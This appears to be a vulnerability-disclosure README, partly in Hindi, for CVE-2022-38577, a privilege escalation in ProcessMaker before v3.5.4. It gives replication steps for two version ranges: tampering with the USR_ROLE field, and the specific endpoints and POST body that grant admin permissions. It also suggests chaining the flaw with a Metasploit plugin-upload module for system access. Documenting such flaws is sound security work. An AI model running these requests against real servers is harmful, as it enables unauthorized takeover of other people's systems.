
ProcessMaker v3.5.4 से पहले के संस्करण में उपयोगकर्ता प्रोफ़ाइल पृष्ठ पर असुरक्षित अनुमतियाँ पाई गईं। यह कमजोरी हमलावरों को सामान्य उपयोगकर्ताओं को प्रशासक बनाने की अनुमति देती है।
This repository has be archived and moved to: https://github.com/sornram9254/CVE-BBP-VDP
ProcessMaker v3.5.4 से पहले के संस्करण में उपयोगकर्ता प्रोफ़ाइल पृष्ठ पर असुरक्षित अनुमतियाँ पाई गईं। यह कमजोरी हमलावरों को सामान्य उपयोगकर्ताओं को प्रशासक बनाने की अनुमति देती है।
* यह शोषण Metasploit मॉड्यूल (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload के साथ उपयोग किया जा सकता है ताकि सिस्टम तक पहुंच प्राप्त की जा सके।
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
1. Log in as normal user.
2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
3. Refresh page to get new role.
for 3.2.1 and before:
1. Log in as normal user.
2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
4. Update role to escalation privileges using POST Body request:
POST /sysworkflow/en/neoclassic/roles/roles_Ajax
request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}
संदर्भ:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing